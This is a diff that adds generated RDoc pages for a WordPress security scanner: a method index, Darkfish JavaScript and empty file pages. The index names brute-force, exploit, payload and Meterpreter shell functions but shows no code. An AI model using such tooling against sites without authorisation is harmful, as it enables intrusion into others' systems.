<li><a href="WpscanOptions.html#method-c-is_long_option-3F">::is_long_option? &mdash; WpscanOptions</a></li>
<li><a href="BruteForce.html#method-c-lines_in_file">::lines_in_file &mdash; BruteForce</a></li>
<li><a href="WpscanOptions.html#method-c-load_from_arguments">::load_from_arguments &mdash; WpscanOptions</a></li>
<li><a href="Malwares.html#method-c-malware_pattern">::malware_pattern &mdash; Malwares</a></li>
<li><a href="Malwares.html#method-c-malwares_file">::malwares_file &mdash; Malwares</a></li>
<li><a href="WpPlugin.html#method-c-new">::new &mdash; WpPlugin</a></li>
<li><a href="Generate_List.html#method-c-new">::new &mdash; Generate_List</a></li>
<li><a href="WpTarget.html#method-c-new">::new &mdash; WpTarget</a></li>
<li><a href="CacheFileStore.html#method-c-new">::new &mdash; CacheFileStore</a></li>
<li><a href="Exploit.html#method-c-new">::new &mdash; Exploit</a></li>
<li><a href="WpUser.html#method-c-new">::new &mdash; WpUser</a></li>
<li><a href="Svn_Parser.html#method-c-new">::new &mdash; Svn_Parser</a></li>
<li><a href="WpscanOptions.html#method-c-new">::new &mdash; WpscanOptions</a></li>
<li><a href="WpVulnerability.html#method-c-new">::new &mdash; WpVulnerability</a></li>
<li><a href="Updater.html#method-c-new">::new &mdash; Updater</a></li>
<li><a href="RpcClient.html#method-c-new">::new &mdash; RpcClient</a></li>
<li><a href="WpTheme.html#method-c-new">::new &mdash; WpTheme</a></li>
<li><a href="WpItem.html#method-c-new">::new &mdash; WpItem</a></li>
<li><a href="WpVersion.html#method-c-new">::new &mdash; WpVersion</a></li>
<li><a href="WpscanOptions.html#method-c-option_to_instance_variable_setter">::option_to_instance_variable_setter &mdash; WpscanOptions</a></li>
<li><a href="WpDetector.html#method-c-passive_detection">::passive_detection &mdash; WpDetector</a></li>
<li><a href="Browser.html#method-c-reset">::reset &mdash; Browser</a></li>
<li><a href="WpTarget.html#method-c-valid_response_codes">::valid_response_codes &mdash; WpTarget</a></li>
<li><a href="WpVersion.html#method-c-version_pattern">::version_pattern &mdash; WpVersion</a></li>
<li><a href="WpItem.html#method-i-3C-3D-3E">#<=> &mdash; WpItem</a></li>
<li><a href="WpUser.html#method-i-3C-3D-3E">#<=> &mdash; WpUser</a></li>
<li><a href="WpItem.html#method-i-3D-3D">#== &mdash; WpItem</a></li>
<li><a href="WpItem.html#method-i-3D-3D-3D">#=== &mdash; WpItem</a></li>
<li><a href="WpTheme.html#method-i-3D-3D-3D">#=== &mdash; WpTheme</a></li>
<li><a href="WpUser.html#method-i-3D-3D-3D">#=== &mdash; WpUser</a></li>
<li><a href="Array.html#method-i-_grep_">#_grep_ &mdash; Array</a></li>
<li><a href="Object.html#method-i-add_http_protocol">#add_http_protocol &mdash; Object</a></li>
<li><a href="Object.html#method-i-add_trailing_slash">#add_trailing_slash &mdash; Object</a></li>
<li><a href="RpcClient.html#method-i-authenticate">#authenticate &mdash; RpcClient</a></li>
<li><a href="WpUsernames.html#method-i-author_url">#author_url &mdash; WpUsernames</a></li>
<li><a href="Object.html#method-i-banner">#banner &mdash; Object</a></li>
<li><a href="WpLoginProtection.html#method-i-better_wp_security_url">#better_wp_security_url &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-bluetrait_event_viewer_url">#bluetrait_event_viewer_url &mdash; WpLoginProtection</a></li>
<li><a href="BruteForce.html#method-i-brute_force">#brute_force &mdash; BruteForce</a></li>
<li><a href="WpItem.html#method-i-changelog_url">#changelog_url &mdash; WpItem</a></li>
<li><a href="Exploit.html#method-i-choose_session">#choose_session &mdash; Exploit</a></li>
<li><a href="CacheFileStore.html#method-i-clean">#clean &mdash; CacheFileStore</a></li>
<li><a href="Object.html#method-i-colorize">#colorize &mdash; Object</a></li>
<li><a href="WpConfigBackup.html#method-i-config_backup">#config_backup &mdash; WpConfigBackup</a></li>
<li><a href="WpTarget.html#method-i-debug_log_url">#debug_log_url &mdash; WpTarget</a></li>
<li><a href="WpItem.html#method-i-directory_listing-3F">#directory_listing? &mdash; WpItem</a></li>
<li><a href="WpscanOptions.html#method-i-enumerate_only_vulnerable_plugins-3D">#enumerate_only_vulnerable_plugins= &mdash; WpscanOptions</a></li>
<li><a href="WpscanOptions.html#method-i-enumerate_only_vulnerable_themes-3D">#enumerate_only_vulnerable_themes= &mdash; WpscanOptions</a></li>
<li><a href="WpscanOptions.html#method-i-enumerate_options_from_string">#enumerate_options_from_string &mdash; WpscanOptions</a></li>
<li><a href="WpscanOptions.html#method-i-enumerate_plugins-3D">#enumerate_plugins= &mdash; WpscanOptions</a></li>
<li><a href="WpscanOptions.html#method-i-enumerate_themes-3D">#enumerate_themes= &mdash; WpscanOptions</a></li>
<li><a href="WpUser.html#method-i-eql-3F">#eql? &mdash; WpUser</a></li>
<li><a href="WpTarget.html#method-i-error_404_hash">#error_404_hash &mdash; WpTarget</a></li>
<li><a href="WpPlugin.html#method-i-error_log-3F">#error_log? &mdash; WpPlugin</a></li>
<li><a href="WpPlugin.html#method-i-error_log_url">#error_log_url &mdash; WpPlugin</a></li>
<li><a href="Exploit.html#method-i-exploit">#exploit &mdash; Exploit</a></li>
<li><a href="RpcClient.html#method-i-exploit">#exploit &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-exploit_info">#exploit_info &mdash; Exploit</a></li>
<li><a href="WpItem.html#method-i-extract_name_from_url">#extract_name_from_url &mdash; WpItem</a></li>
<li><a href="WpUsernames.html#method-i-extract_nickname_from_body">#extract_nickname_from_body &mdash; WpUsernames</a></li>
<li><a href="Browser.html#method-i-forge_request">#forge_request &mdash; Browser</a></li>
<li><a href="WpFullPathDisclosure.html#method-i-full_path_disclosure_url">#full_path_disclosure_url &mdash; WpFullPathDisclosure</a></li>
<li><a href="Generate_List.html#method-i-generate_full_list">#generate_full_list &mdash; Generate_List</a></li>
<li><a href="Generate_List.html#method-i-generate_popular_list">#generate_popular_list &mdash; Generate_List</a></li>
<li><a href="Browser.html#method-i-get">#get &mdash; Browser</a></li>
<li><a href="CacheFileStore.html#method-i-get_entry_file_path">#get_entry_file_path &mdash; CacheFileStore</a></li>
<li><a href="Object.html#method-i-get_equal_string_end">#get_equal_string_end &mdash; Object</a></li>
<li><a href="RpcClient.html#method-i-get_exploit_info">#get_exploit_info &mdash; RpcClient</a></li>
<li><a href="WpItem.html#method-i-get_full_url">#get_full_url &mdash; WpItem</a></li>
<li><a href="WpUsernames.html#method-i-get_nickname_from_response">#get_nickname_from_response &mdash; WpUsernames</a></li>
<li><a href="WpUsernames.html#method-i-get_nickname_from_url">#get_nickname_from_url &mdash; WpUsernames</a></li>
<li><a href="RpcClient.html#method-i-get_options">#get_options &mdash; RpcClient</a></li>
<li><a href="RpcClient.html#method-i-get_payloads">#get_payloads &mdash; RpcClient</a></li>
<li><a href="Generate_List.html#method-i-get_popular_items">#get_popular_items &mdash; Generate_List</a></li>
<li><a href="WpItem.html#method-i-get_sub_folder">#get_sub_folder &mdash; WpItem</a></li>
<li><a href="WpItem.html#method-i-get_url_without_filename">#get_url_without_filename &mdash; WpItem</a></li>
<li><a href="Object.html#method-i-green">#green &mdash; Object</a></li>
<li><a href="Array.html#method-i-grep">#grep &mdash; Array</a></li>
<li><a href="WpLoginProtection.html#method-i-has_better_wp_security_protection-3F">#has_better_wp_security_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-has_bluetrait_event_viewer_protection-3F">#has_bluetrait_event_viewer_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpItem.html#method-i-has_changelog-3F">#has_changelog? &mdash; WpItem</a></li>
<li><a href="WpTarget.html#method-i-has_debug_log-3F">#has_debug_log? &mdash; WpTarget</a></li>
<li><a href="WpFullPathDisclosure.html#method-i-has_full_path_disclosure-3F">#has_full_path_disclosure? &mdash; WpFullPathDisclosure</a></li>
<li><a href="WpLoginProtection.html#method-i-has_limit_login_attempts_protection-3F">#has_limit_login_attempts_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-has_login_lock_protection-3F">#has_login_lock_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-has_login_lockdown_protection-3F">#has_login_lockdown_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-has_login_protection-3F">#has_login_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-has_login_security_solution_protection-3F">#has_login_security_solution_protection? &mdash; WpLoginProtection</a></li>
<li><a href="Malwares.html#method-i-has_malwares-3F">#has_malwares? &mdash; Malwares</a></li>
<li><a href="WpscanOptions.html#method-i-has_options-3F">#has_options? &mdash; WpscanOptions</a></li>
<li><a href="WpItem.html#method-i-has_readme-3F">#has_readme? &mdash; WpItem</a></li>
<li><a href="WpReadme.html#method-i-has_readme-3F">#has_readme? &mdash; WpReadme</a></li>
<li><a href="WpLoginProtection.html#method-i-has_simple_login_lockdown_protection-3F">#has_simple_login_lockdown_protection? &mdash; WpLoginProtection</a></li>
<li><a href="WpTimthumbs.html#method-i-has_timthumbs-3F">#has_timthumbs? &mdash; WpTimthumbs</a></li>
<li><a href="Object.html#method-i-help">#help &mdash; Object</a></li>
<li><a href="SvnUpdater.html#method-i-is_installed-3F">#is_installed? &mdash; SvnUpdater</a></li>
<li><a href="Updater.html#method-i-is_installed-3F">#is_installed? &mdash; Updater</a></li>
<li><a href="GitUpdater.html#method-i-is_installed-3F">#is_installed? &mdash; GitUpdater</a></li>
<li><a href="WpTarget.html#method-i-is_multisite-3F">#is_multisite? &mdash; WpTarget</a></li>
<li><a href="WebSite.html#method-i-is_online-3F">#is_online? &mdash; WebSite</a></li>
<li><a href="WebSite.html#method-i-is_wordpress-3F">#is_wordpress? &mdash; WebSite</a></li>
<li><a href="Exploit.html#method-i-job_id">#job_id &mdash; Exploit</a></li>
<li><a href="RpcClient.html#method-i-jobs">#jobs &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-kill_session">#kill_session &mdash; Exploit</a></li>
<li><a href="RpcClient.html#method-i-kill_session">#kill_session &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-last_session_id">#last_session_id &mdash; Exploit</a></li>
<li><a href="WpLoginProtection.html#method-i-limit_login_attempts_url">#limit_login_attempts_url &mdash; WpLoginProtection</a></li>
<li><a href="Browser.html#method-i-load_config">#load_config &mdash; Browser</a></li>
<li><a href="Updater.html#method-i-local_revision_number">#local_revision_number &mdash; Updater</a></li>
<li><a href="SvnUpdater.html#method-i-local_revision_number">#local_revision_number &mdash; SvnUpdater</a></li>
<li><a href="GitUpdater.html#method-i-local_revision_number">#local_revision_number &mdash; GitUpdater</a></li>
<li><a href="RpcClient.html#method-i-login">#login &mdash; RpcClient</a></li>
<li><a href="WpLoginProtection.html#method-i-login_protection_plugin">#login_protection_plugin &mdash; WpLoginProtection</a></li>
<li><a href="WpLoginProtection.html#method-i-login_security_solution_url">#login_security_solution_url &mdash; WpLoginProtection</a></li>
<li><a href="WpTarget.html#method-i-login_url">#login_url &mdash; WpTarget</a></li>
<li><a href="Malwares.html#method-i-malwares">#malwares &mdash; Malwares</a></li>
<li><a href="Browser.html#method-i-max_threads-3D">#max_threads= &mdash; Browser</a></li>
<li><a href="Browser.html#method-i-merge_request_params">#merge_request_params &mdash; Browser</a></li>
<li><a href="RpcClient.html#method-i-meterpreter_read">#meterpreter_read &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-meterpreter_read">#meterpreter_read &mdash; Exploit</a></li>
<li><a href="RpcClient.html#method-i-meterpreter_write">#meterpreter_write &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-meterpreter_write">#meterpreter_write &mdash; Exploit</a></li>
<li><a href="Svn_Parser.html#method-i-parse">#parse &mdash; Svn_Parser</a></li>
<li><a href="WpPlugins.html#method-i-plugins_from_aggressive_detection">#plugins_from_aggressive_detection &mdash; WpPlugins</a></li>
<li><a href="WpPlugins.html#method-i-plugins_from_passive_detection">#plugins_from_passive_detection &mdash; WpPlugins</a></li>
<li><a href="Browser.html#method-i-post">#post &mdash; Browser</a></li>
<li><a href="WpscanOptions.html#method-i-proxy-3D">#proxy= &mdash; WpscanOptions</a></li>
<li><a href="Updater.html#method-i-raise_must_be_implemented">#raise_must_be_implemented &mdash; Updater</a></li>
<li><a href="CacheFileStore.html#method-i-read_entry">#read_entry &mdash; CacheFileStore</a></li>
<li><a href="RpcClient.html#method-i-read_shell">#read_shell &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-read_shell">#read_shell &mdash; Exploit</a></li>
<li><a href="WpItem.html#method-i-readme_url">#readme_url &mdash; WpItem</a></li>
<li><a href="WpReadme.html#method-i-readme_url">#readme_url &mdash; WpReadme</a></li>
<li><a href="Object.html#method-i-red">#red &mdash; Object</a></li>
<li><a href="WebSite.html#method-i-redirection">#redirection &mdash; WebSite</a></li>
<li><a href="WpTarget.html#method-i-registration_enabled-3F">#registration_enabled? &mdash; WpTarget</a></li>
<li><a href="WpTarget.html#method-i-registration_url">#registration_url &mdash; WpTarget</a></li>
<li><a href="WpUsernames.html#method-i-remove_junk_from_nickname">#remove_junk_from_nickname &mdash; WpUsernames</a></li>
<li><a href="GitUpdater.html#method-i-repo_directory_arguments">#repo_directory_arguments &mdash; GitUpdater</a></li>
<li><a href="Object.html#method-i-require_files_from_directory">#require_files_from_directory &mdash; Object</a></li>
<li><a href="Generate_List.html#method-i-save">#save &mdash; Generate_List</a></li>
<li><a href="WpTarget.html#method-i-search_replace_db_2_exists-3F">#search_replace_db_2_exists? &mdash; WpTarget</a></li>
<li><a href="WpTarget.html#method-i-search_replace_db_2_url">#search_replace_db_2_url &mdash; WpTarget</a></li>
<li><a href="Exploit.html#method-i-session_count">#session_count &mdash; Exploit</a></li>
<li><a href="Exploit.html#method-i-sessions">#sessions &mdash; Exploit</a></li>
<li><a href="RpcClient.html#method-i-sessions">#sessions &mdash; RpcClient</a></li>
<li><a href="WpscanOptions.html#method-i-set_option_from_cli">#set_option_from_cli &mdash; WpscanOptions</a></li>
<li><a href="WpLoginProtection.html#method-i-simple_login_lockdown_url">#simple_login_lockdown_url &mdash; WpLoginProtection</a></li>
<li><a href="Exploit.html#method-i-start">#start &mdash; Exploit</a></li>
<li><a href="WpTimthumbs.html#method-i-targets_url_from_theme">#targets_url_from_theme &mdash; WpTimthumbs</a></li>
<li><a href="WpTarget.html#method-i-theme">#theme &mdash; WpTarget</a></li>
<li><a href="WpThemes.html#method-i-themes_from_aggressive_detection">#themes_from_aggressive_detection &mdash; WpThemes</a></li>
<li><a href="WpThemes.html#method-i-themes_from_passive_detection">#themes_from_passive_detection &mdash; WpThemes</a></li>
<li><a href="WpscanOptions.html#method-i-threads-3D">#threads= &mdash; WpscanOptions</a></li>
<li><a href="WpTimthumbs.html#method-i-timthumbs">#timthumbs &mdash; WpTimthumbs</a></li>
<li><a href="WpscanOptions.html#method-i-to_h">#to_h &mdash; WpscanOptions</a></li>
<li><a href="WpItem.html#method-i-to_s">#to_s &mdash; WpItem</a></li>
<li><a href="Updater.html#method-i-update">#update &mdash; Updater</a></li>
<li><a href="SvnUpdater.html#method-i-update">#update &mdash; SvnUpdater</a></li>
<li><a href="GitUpdater.html#method-i-update">#update &mdash; GitUpdater</a></li>
<li><a href="WpTarget.html#method-i-url">#url &mdash; WpTarget</a></li>
<li><a href="WpscanOptions.html#method-i-url-3D">#url= &mdash; WpscanOptions</a></li>
<li><a href="Object.html#method-i-usage">#usage &mdash; Object</a></li>
<li><a href="Browser.html#method-i-user_agent">#user_agent &mdash; Browser</a></li>
<li><a href="Browser.html#method-i-user_agent_mode-3D">#user_agent_mode= &mdash; Browser</a></li>
<li><a href="WpUsernames.html#method-i-usernames">#usernames &mdash; WpUsernames</a></li>
<li><a href="WpItem.html#method-i-version">#version &mdash; WpItem</a></li>
<li><a href="WpTarget.html#method-i-version">#version &mdash; WpTarget</a></li>
<li><a href="Vulnerable.html#method-i-vulnerabilities">#vulnerabilities &mdash; Vulnerable</a></li>
<li><a href="WpscanOptions.html#method-i-wordlist-3D">#wordlist= &mdash; WpscanOptions</a></li>
<li><a href="WpTarget.html#method-i-wp_content_dir">#wp_content_dir &mdash; WpTarget</a></li>
<li><a href="WpTarget.html#method-i-wp_plugins_dir">#wp_plugins_dir &mdash; WpTarget</a></li>
<li><a href="WpTarget.html#method-i-wp_plugins_dir_exists-3F">#wp_plugins_dir_exists? &mdash; WpTarget</a></li>
<li><a href="CacheFileStore.html#method-i-write_entry">#write_entry &mdash; CacheFileStore</a></li>
<li><a href="RpcClient.html#method-i-write_shell">#write_shell &mdash; RpcClient</a></li>
<li><a href="Exploit.html#method-i-write_shell">#write_shell &mdash; Exploit</a></li>
<li><a href="WebSite.html#method-i-xmlrpc_url">#xmlrpc_url &mdash; WebSite</a></li>
</ul>
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

116
doc/js/darkfish.js Normal file
View File

@@ -0,0 +1,116 @@
/**
*
* Darkfish Page Functions
* $Id: darkfish.js 53 2009-01-07 02:52:03Z deveiant $
*
* Author: Michael Granger <mgranger@laika.com>
*
*/
/* Provide console simulation for firebug-less environments */
if (!("console" in window) || !("firebug" in console)) {
var names = ["log", "debug", "info", "warn", "error", "assert", "dir", "dirxml",
"group", "groupEnd", "time", "timeEnd", "count", "trace", "profile", "profileEnd"];
window.console = {};
for (var i = 0; i < names.length; ++i)
window.console[names[i]] = function() {};
};
/**
* Unwrap the first element that matches the given @expr@ from the targets and return them.
*/
$.fn.unwrap = function( expr ) {
return this.each( function() {
$(this).parents( expr ).eq( 0 ).after( this ).remove();
});
};
function showSource( e ) {
var target = e.target;
var codeSections = $(target).
parents('.method-detail').
find('.method-source-code');
$(target).
parents('.method-detail').
find('.method-source-code').
slideToggle();
};
function hookSourceViews() {
$('.method-description,.method-heading').click( showSource );
};
function toggleDebuggingSection() {
$('.debugging-section').slideToggle();
};
function hookDebuggingToggle() {
$('#debugging-toggle img').click( toggleDebuggingSection );
};
function hookQuickSearch() {
$('.quicksearch-field').each( function() {
var searchElems = $(this).parents('.section').find( 'li' );
var toggle = $(this).parents('.section').find('h3 .search-toggle');
// console.debug( "Toggle is: %o", toggle );
var qsbox = $(this).parents('form').get( 0 );
$(this).quicksearch( this, searchElems, {
noSearchResultsIndicator: 'no-class-search-results',
focusOnLoad: false
});
$(toggle).click( function() {
// console.debug( "Toggling qsbox: %o", qsbox );
$(qsbox).toggle();
});
});
};
function highlightTarget( anchor ) {
console.debug( "Highlighting target '%s'.", anchor );
$("a[name=" + anchor + "]").each( function() {
if ( !$(this).parent().parent().hasClass('target-section') ) {
console.debug( "Wrapping the target-section" );
$('div.method-detail').unwrap( 'div.target-section' );
$(this).parent().wrap( '<div class="target-section"></div>' );
} else {
console.debug( "Already wrapped." );
}
});
};
function highlightLocationTarget() {
console.debug( "Location hash: %s", window.location.hash );
if ( ! window.location.hash || window.location.hash.length == 0 ) return;
var anchor = window.location.hash.substring(1);
console.debug( "Found anchor: %s; matching %s", anchor, "a[name=" + anchor + "]" );
highlightTarget( anchor );
};
function highlightClickTarget( event ) {
console.debug( "Highlighting click target for event %o", event.target );
try {
var anchor = $(event.target).attr( 'href' ).substring(1);
console.debug( "Found target anchor: %s", anchor );
highlightTarget( anchor );
} catch ( err ) {
console.error( "Exception while highlighting: %o", err );
};
};
$(document).ready( function() {
hookSourceViews();
hookDebuggingToggle();
hookQuickSearch();
highlightLocationTarget();
$('ul.link-list a').bind( "click", highlightClickTarget );
});

32
doc/js/jquery.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

114
doc/js/quicksearch.js Normal file
View File

@@ -0,0 +1,114 @@
/**
*
* JQuery QuickSearch - Hook up a form field to hide non-matching elements.
* $Id: quicksearch.js 53 2009-01-07 02:52:03Z deveiant $
*
* Author: Michael Granger <mgranger@laika.com>
*
*/
jQuery.fn.quicksearch = function( target, searchElems, options ) {
// console.debug( "Quicksearch fn" );
var settings = {
delay: 250,
clearButton: false,
highlightMatches: false,
focusOnLoad: false,
noSearchResultsIndicator: null
};
if ( options ) $.extend( settings, options );
return jQuery(this).each( function() {
// console.debug( "Creating a new quicksearch on %o for %o", this, searchElems );
new jQuery.quicksearch( this, searchElems, settings );
});
};
jQuery.quicksearch = function( searchBox, searchElems, settings ) {
var timeout;
var boxdiv = $(searchBox).parents('div').eq(0);
function init() {
setupKeyEventHandlers();
focusOnLoad();
};
function setupKeyEventHandlers() {
// console.debug( "Hooking up the 'keypress' event to %o", searchBox );
$(searchBox).
unbind( 'keyup' ).
keyup( function(e) { return onSearchKey( e.keyCode ); });
$(searchBox).
unbind( 'keypress' ).
keypress( function(e) {
switch( e.which ) {
// Execute the search on Enter, Tab, or Newline
case 9:
case 13:
case 10:
clearTimeout( timeout );
e.preventDefault();
doQuickSearch();
break;
// Allow backspace
case 8:
return true;
break;
// Only allow valid search characters
default:
return validQSChar( e.charCode );
}
});
};
function focusOnLoad() {
if ( !settings.focusOnLoad ) return false;
$(searchBox).focus();
};
function onSearchKey ( code ) {
clearTimeout( timeout );
// console.debug( "...scheduling search." );
timeout = setTimeout( doQuickSearch, settings.delay );
};
function validQSChar( code ) {
var c = String.fromCharCode( code );
return (
(c == ':') ||
(c >= 'a' && c <= 'z') ||
(c >= 'A' && c <= 'Z')
);
};
function doQuickSearch() {
var searchText = searchBox.value;
var pat = new RegExp( searchText, "im" );
var shownCount = 0;
if ( settings.noSearchResultsIndicator ) {
$('#' + settings.noSearchResultsIndicator).hide();
}
// All elements start out hidden
$(searchElems).each( function(index) {
var str = $(this).text();
if ( pat.test(str) ) {
shownCount += 1;
$(this).fadeIn();
} else {
$(this).hide();
}
});
if ( shownCount == 0 && settings.noSearchResultsIndicator ) {
$('#' + settings.noSearchResultsIndicator).slideDown();
}
};
init();
};

10
doc/js/thickbox-compressed.js Normal file
View File

File diff suppressed because one or more lines are too long

52
doc/lib/browser_rb.html Normal file
View File

@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: browser.rb [RDoc Documentation]</title>
<link type="text/css" media="screen" href="../rdoc.css" rel="stylesheet" />
<script src="../js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file file-popup">
<div id="metadata">
<dl>
<dt class="modified-date">Last Modified</dt>
<dd class="modified-date">2012-09-22 15:51:15 +0200</dd>
<dt class="requires">Requires</dt>
<dd class="requires">
<ul>
</ul>
</dd>
</dl>
</div>
<div id="documentation">
<div class="description">
<h2>Description</h2>
</div>
</div>
</body>
</html>

54
doc/lib/cache_file_store_rb.html Normal file
View File

@@ -0,0 +1,54 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: cache_file_store.rb [RDoc Documentation]</title>
<link type="text/css" media="screen" href="../rdoc.css" rel="stylesheet" />
<script src="../js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file file-popup">
<div id="metadata">
<dl>
<dt class="modified-date">Last Modified</dt>
<dd class="modified-date">2012-09-22 15:00:03 +0200</dd>
<dt class="requires">Requires</dt>
<dd class="requires">
<ul>
<li>yaml</li>
</ul>
</dd>
</dl>
</div>
<div id="documentation">
<div class="description">
<h2>Description</h2>
</div>
</div>
</body>
</html>

52
doc/lib/common_helper_rb.html Normal file
View File

@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: common_helper.rb [RDoc Documentation]</title>
<link type="text/css" media="screen" href="../rdoc.css" rel="stylesheet" />
<script src="../js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file file-popup">
<div id="metadata">
<dl>
<dt class="modified-date">Last Modified</dt>
<dd class="modified-date">2012-09-22 16:08:50 +0200</dd>
<dt class="requires">Requires</dt>
<dd class="requires">
<ul>
</ul>
</dd>
</dl>
</div>
<div id="documentation">
<div class="description">
<h2>Description</h2>
</div>
</div>
</body>
</html>

82
doc/lib/environment_rb.html Normal file
View File

@@ -0,0 +1,82 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: environment.rb [RDoc Documentation]</title>
<link type="text/css" media="screen" href="../rdoc.css" rel="stylesheet" />
<script src="../js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="../js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file file-popup">
<div id="metadata">
<dl>
<dt class="modified-date">Last Modified</dt>
<dd class="modified-date">2012-09-22 09:22:22 +0200</dd>
<dt class="requires">Requires</dt>
<dd class="requires">
<ul>
<li>rubygems</li>
<li>getoptlong</li>
<li>uri</li>
<li>time</li>
<li>resolv</li>
<li>xmlrpc/client</li>
<li>digest/md5</li>
<li>readline</li>
<li>base64</li>
<li>cgi</li>
<li>rbconfig</li>
<li>pp</li>
<li>typhoeus</li>
<li>json</li>
<li>nokogiri</li>
</ul>
</dd>
</dl>
</div>
<div id="documentation">
<div class="description">
<h2>Description</h2>
</div>
</div>
</body>
</html>

52
doc/lib/updater/git_updater_rb.html Normal file
View File

@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: git_updater.rb [RDoc Documentation]</title>
<link type="text/css" media="screen" href="../../rdoc.css" rel="stylesheet" />
<script src="../../js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="../../js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="../../js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="../../js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file file-popup">
<div id="metadata">
<dl>
<dt class="modified-date">Last Modified</dt>
<dd class="modified-date">2012-09-15 08:00:23 +0200</dd>
<dt class="requires">Requires</dt>
<dd class="requires">
<ul>
</ul>
</dd>
</dl>
</div>
<div id="documentation">
<div class="description">
<h2>Description</h2>
</div>
</div>
</body>
</html>

52
doc/lib/updater/svn_updater_rb.html Normal file
View File

@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: svn_updater.rb [RDoc Documentation]</title>
<link type="text/css" media="screen" href="../../rdoc.css" rel="stylesheet" />
<script src="../../js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="../../js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="../../js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="../../js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file file-popup">
<div id="metadata">
<dl>
<dt class="modified-date">Last Modified</dt>
<dd class="modified-date">2012-09-22 15:04:12 +0200</dd>
<dt class="requires">Requires</dt>
<dd class="requires">
<ul>
</ul>
</dd>
</dl>
</div>
<div id="documentation">
<div class="description">
<h2>Description</h2>
</div>
</div>
</body>
</html>

52
doc/lib/updater/updater_factory_rb.html Normal file
View File

@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
